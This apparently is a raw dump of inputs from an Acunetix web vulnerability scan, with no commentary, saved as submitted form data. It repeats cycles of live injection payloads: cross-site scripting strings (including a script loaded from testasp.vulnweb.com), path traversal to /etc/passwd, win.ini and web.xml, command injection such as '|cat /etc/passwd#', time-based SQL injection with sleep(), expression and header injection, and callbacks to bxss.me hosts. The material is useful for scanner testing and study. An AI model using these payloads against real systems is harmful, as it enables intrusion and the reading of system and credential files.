${@print(md5(acunetix_wvs_security_test))}

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

J1DfGXLe'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

1

dcUlWxDQ')

1

acunetix_wvs_invalid_filename

http://hitSHnAQ8izDW.bxss.me/

1

'&dir&'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

cJuc2fNa'))

1

1

[url=http://www.acunetix.com]website security[/url]

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

"&dir&"

1

1

1

1

comments

file:///etc/passwd

http://www.acunetix.tst

1_Da65h <ScRiPt >prompt(955625)</ScRiPt>

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

comments/.

1

1

1'"()&%<ScRiPt >prompt(999865)</ScRiPt>

'|dir

1

1

1

WEB-INF/web.xml

1

1

<!--

'"()&%<ScRiPt >prompt(977472)</ScRiPt>

"|dir

1

WEB-INF\web.xml

1

1

1

1

1_993253

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acu3554\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3554

1

../../../../../../../../../../windows/win.ini.jpg

1

acux1307\xc0\xbez1\xc0\xbcz2a\x90bcxuca1307

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(959623)</ScRiPt>

1

1

................windowswin.ini

1

1<script>prompt(938164)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(995150)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?968002></ScRiPt>

1

1<ScRiPt >prompt(982422)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(974804)">

response.write(9236388*9595301)

1

1

'+response.write(9236388*9595301)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939599)"></g></svg>

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(996371))>

WEB-INF/web.xml

"+response.write(9236388*9595301)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

WEB-INF\web.xml

1<iframe src='data:text/html

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(937112)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961595)>

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

${99893+99953}

1

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(985168)>

1

1

1&n942058=v993829

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

1

1<img/src=">" onerror=alert(990263)>

'|'ld

RXNSIXpt'

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1

"|"ld

MD6O2EQb')

1

1<ScRiPt%20>prompt(965163)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1

1&lt

1

'

UN8a5PHM'))

testasp.vulnweb.com

/etc/passwd

'

1

1

1

1

-1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

\xf6<img acu onmouseover=prompt(909301) //\xf6>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(906602)>

1

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hitZRwX1Gnt7r.bxss.me/

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

-1))

<a href='http://www.acunetix.com'>website security</a>

1

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

1

1

[url=http://www.acunetix.com]website security[/url]

lriWTEb9'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'"

http://www.acunetix.tst

'&dir&'

comments/.

HeDEL1t9')

1

1_kdivc <ScRiPt >prompt(999502)</ScRiPt>

1

file:///etc/passwd

1

<!--

1

1

1

1'"()&%<ScRiPt >prompt(991050)</ScRiPt>

"&dir&"

Gcz9rJJo'))

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(986943)</ScRiPt>

1

|dir

1

1

WEB-INF/web.xml

1

1

1_971609

1

'|dir

1

1

1

1

WEB-INF\web.xml

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

acu10314\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10314

1

1

../../../../../../../../../../boot.ini

acux3648\xc0\xbez1\xc0\xbcz2a\x90bcxuca3648

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(911092)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1<script>prompt(956632)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(991919)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931029></ScRiPt>

1

1

1

1<ScRiPt >prompt(924083)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(943262)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936514)"></g></svg>

1

response.write(9234012*9410351)

1

1<div style=width:expression(prompt(984938))>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'+response.write(9234012*9410351)+'

&cat /etc/passwd&

WEB-INF/web.xml

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

"+response.write(9234012*9410351)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(955624)>

1

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981599)>

`cat /etc/passwd`

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1<img src=xyz OnErRor=prompt(993363)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

1

1

-1

1

${99831+99495}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(909735)>

'|'ld

1&n933775=v970515

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

"|"ld

1<ScRiPt%20>prompt(938899)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

)

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1&lt

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

'

bEjPrmiO'

1

\xf6<img acu onmouseover=prompt(991892) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

/etc/passwd

1

1

'

ocsGJ0Ql')

"

1

1

1

1<input autofocus onfocus=prompt(956057)>

testasp.vulnweb.com

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

"

1

QTbSZg1C'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

&dir

1

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

http://hit5LG5u0IZJb.bxss.me/

1

[url=http://www.acunetix.com]website security[/url]

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1

-1)

"&dir&"

1_n2F3L <ScRiPt >prompt(909368)</ScRiPt>

1

1

1

1

-1))

1

comments

|dir

file:///etc/passwd

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

'|dir

comments/.

http://www.acunetix.tst

UWLFNL4h'

1

1

1

'"

1

WEB-INF/web.xml

1

fLxvfudZ')

1

"|dir

1'"()&%<ScRiPt >prompt(924245)</ScRiPt>

1

WEB-INF\web.xml

1

<!--

1

1

'"()&%<ScRiPt >prompt(963531)</ScRiPt>

1

OtVCG7ST'))

1

1

1

../../../../../../../../../../windows/win.ini

1

1_985070

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu2080\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2080

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux6356\xc0\xbez1\xc0\xbcz2a\x90bcxuca6356

1

1

1

1<ScRiPt >prompt(976493)</ScRiPt>

1

................windowswin.ini

1

1<script>prompt(996369)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(964760)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903583></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(947508)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(938370)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944294)"></g></svg>

1

1

response.write(9701247*9775166)

1

1<div style=width:expression(prompt(985759))>

WEB-INF/web.xml

1

'+response.write(9701247*9775166)+'

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

WEB-INF\web.xml

"+response.write(9701247*9775166)+"

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(949205)>

'&cat /etc/passwd&'

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(978157)>

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(979892)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img/src=">" onerror=alert(929788)>

1

1

${99769+100169}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<ScRiPt%20>prompt(946834)</sCripT>

1

`cat /etc/passwd`

1

1

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

|cat /etc/passwd#

)

1&lt

1&n903071=v917503

'|'ld

-1)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

\xf6<img acu onmouseover=prompt(983236) //\xf6>

!(()&&!|*|*|

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

-1))

1

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(947786)>

NUPhxYdv'

1

1

/etc/passwd

'

1

<a href='http://www.acunetix.com'>website security</a>

1

1

Kg0yjhtj')

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

[url=http://www.acunetix.com]website security[/url]

1

"

1

AJjtXth7'))

1

http://hitzvjatNNWju.bxss.me/

1

1_H23eG <ScRiPt >prompt(909932)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

-1

1

1

comments

&dir

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

-1)

1

http://www.acunetix.tst

1

1

1

'&dir&'

comments/.

1

'"

-1))

1

"&dir&"

1

1'"()&%<ScRiPt >prompt(916181)</ScRiPt>

1

file:///etc/passwd

WbxFQdjs'

<!--

1

1

'"()&%<ScRiPt >prompt(982570)</ScRiPt>

|dir

1

1

1

rFxAuRX4')

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

1_974690

1

"|dir

WEB-INF/web.xml

pV2MA9yS'))

1

1

1

1

1

1

WEB-INF\web.xml

1

acu2261\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2261

1

../../../../../../../../../../windows/win.ini

acux3477\xc0\xbez1\xc0\xbcz2a\x90bcxuca3477

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(929131)</ScRiPt>

1

1

1<script>prompt(920984)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(942111)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975250></ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(990919)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<video><source onerror="javascript:prompt(995561)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922564)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9259773*9234699)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(997402))>

1

1

1

1

'+response.write(9259773*9234699)+'

1

1<iframe src='data:text/html

"+response.write(9259773*9234699)+"

1

1

&cat /etc/passwd&

1

1<body onload=prompt(973693)>

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(955503)>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(939769)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1

1<img/src=">" onerror=alert(994373)>

${100371+99852}

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(925505)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n992415=v904967

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

)

1

|cat /etc/passwd#

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

1

\xf6<img acu onmouseover=prompt(955862) //\xf6>

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

gbt5769B'

1<input autofocus onfocus=prompt(930018)>

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

^(#$!@#$)(()))******

'"()

1

1

1

'

svXMWpx8')

<a href='http://www.acunetix.com'>website security</a>

1

1

/etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

cUk7H0Fp'))

1

'

1

1

1

1_PGhE4 <ScRiPt >prompt(951096)</ScRiPt>

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

"

1

1

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1)

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitcktLVUiMxm.bxss.me/

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1

1

1

1

1

&dir

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

bu4tc39r'

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(921991)</ScRiPt>

'"

comments/.

1

1

IO7Huuqo')

1

'&dir&'

1

<!--

1

'"()&%<ScRiPt >prompt(944835)</ScRiPt>

file:///etc/passwd

1

Fm71pDjA'))

"&dir&"

1_944899

1

1

1

|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

WEB-INF/web.xml

'|dir

1

1

"|dir

WEB-INF\web.xml

1

acu5587\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5587

1

1

1

../../../../../../../../../../windows/win.ini

1

acux2866\xc0\xbez1\xc0\xbcz2a\x90bcxuca2866

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(995545)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(903029)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(995036)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984706></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(961335)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

response.write(9445659*9739889)

1

1<video><source onerror="javascript:prompt(977189)">

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'+response.write(9445659*9739889)+'

1

&cat /etc/passwd&

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906477)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"+response.write(9445659*9739889)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(948507))>

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<iframe src='data:text/html

1

WEB-INF/web.xml

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(940638)>

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(971261)>

1

1

-1

${99957+100215}

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(936740)>

`cat /etc/passwd`

1&n929958=v948282

1

1

-1)

1

1some_inexistent_file_with_long_name%00.jpg

1

1

|cat /etc/passwd#

1<img/src=">" onerror=alert(929515)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1<ScRiPt%20>prompt(931519)</sCripT>

'|'ld

1

^(#$!@#$)(()))******

'"()

'

testasp.vulnweb.com

1

YtgVy9XR'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

1&lt

1

"

1

/etc/passwd

1

E0Nq7Cel')

1

1

${@print(md5(acunetix_wvs_security_test))}

1

\xf6<img acu onmouseover=prompt(925263) //\xf6>

1

1

1

sf57SnW5'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

'

1

1<input autofocus onfocus=prompt(942482)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

1

-1)

1

1

<a href='http://www.acunetix.com'>website security</a>

http://hitoZpxPQJoS1.bxss.me/

||cat /etc/passwd

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

[url=http://www.acunetix.com]website security[/url]

1

comments

1

GoQr34C6'

&dir

comments

1_eKoco <ScRiPt >prompt(949510)</ScRiPt>

1

1

1

6FzkIq5W')

1

file:///etc/passwd

http://www.acunetix.tst

comments/.

hCm2O212'))

1

'"

'&dir&'

1

1'"()&%<ScRiPt >prompt(920886)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

1

<!--

1

1

"&dir&"

1

'"()&%<ScRiPt >prompt(920572)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1_939298

1

|dir

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

../../../../../../../../../../boot.ini

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

acu4280\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4280

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux8910\xc0\xbez1\xc0\xbcz2a\x90bcxuca8910

1

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(977585)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(972700)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(948717)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?962182></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(973167)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(926947)">

1

1

response.write(9119099*9738461)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984082)"></g></svg>

1

1

1<div style=width:expression(prompt(991698))>

1

'+response.write(9119099*9738461)+'

WEB-INF/web.xml

1

1<iframe src='data:text/html

"+response.write(9119099*9738461)+"

1

&cat /etc/passwd&

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1<body onload=prompt(964252)>

'&cat /etc/passwd&'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950494)>

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(923013)>

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${99734+100071}

1<img/src=">" onerror=alert(980157)>

1

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1)

1<ScRiPt%20>prompt(919829)</sCripT>

1

|cat /etc/passwd#

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n903405=v985341

-1))

1&lt

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)

1

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

z4oJkMKA'

\xf6<img acu onmouseover=prompt(956391) //\xf6>

!(()&&!|*|*|

/etc/passwd

1

'"()

